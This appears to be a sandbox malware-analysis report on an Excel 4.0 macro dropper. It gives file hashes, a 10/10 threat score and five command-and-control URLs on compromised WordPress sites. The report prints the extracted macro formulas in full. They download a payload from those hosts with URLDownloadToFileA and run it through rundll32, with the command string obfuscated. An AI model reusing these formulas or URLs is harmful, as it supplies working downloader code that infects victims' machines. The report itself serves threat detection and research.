General

  • Target

    e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7

  • Size

    103KB

  • Sample

    241111-vl71xasdjf

  • MD5

    172f22a056537d74eed933a35a33efaa

  • SHA1

    b3dc4ea706f8edca034d3c9f721eef33ac49b9cb

  • SHA256

    e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7

  • SHA512

    bf537fef12be6790c2831ef57ef7f6b6b8104e27341b87a02f3de28c941252422ba3d7ceb771986e22072f0a3feeef98be8fee5d49108267025d5a8dc510359a

  • SSDEEP

    3072:jHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:DhRYXHrbtO8eOaDPk1ox

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://landorestates.com/wordpress/NELf96wr/

https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/

https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/

https://csinoticias.com/wp-includes/RnHjIzg/

Attributes
  • formulas

    =FORMULA()
    =TODO
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://landorestates.com/wordpress/NELf96wr/","..\wlw.ocx",0,0)
    =IF('TTGEHEHEHFHDG'!C15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/","..\wlw.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/","..\wlw.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/","..\wlw.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://csinoticias.com/wp-includes/RnHjIzg/","..\wlw.ocx",0,0))
    =IF('TTGEHEHEHFHDG'!C23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\rundll32.exe ..\wlw.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r")

Extracted

Language: xlm4.0
Source: xlm40.dropper
URLs:

    http://landorestates.com/wordpress/NELf96wr/

    https://www.rockwoodsaloon.com/wp-admin/A706GTXNufQSWXG52/

    http://butziger.com/meettiming/hBJCeNGAvBpGZoD7ee/

    https://teamsandeep.com/wp-content/p3f2n6wc4nwfg/

    https://csinoticias.com/wp-includes/RnHjIzg/

Targets

    • Target

      e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7

    • Size

      103KB

    • MD5

      172f22a056537d74eed933a35a33efaa

    • SHA1

      b3dc4ea706f8edca034d3c9f721eef33ac49b9cb

    • SHA256

      e34976729e0020c199a1d202e8b669fe4c3177c46dff2af690e24e84ea74caf7

    • SHA512

      bf537fef12be6790c2831ef57ef7f6b6b8104e27341b87a02f3de28c941252422ba3d7ceb771986e22072f0a3feeef98be8fee5d49108267025d5a8dc510359a

    • SSDEEP

      3072:jHhRUVXHqu8hahYIfiQOVOveshVf4KwJQikmGox:DhRYXHrbtO8eOaDPk1ox

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks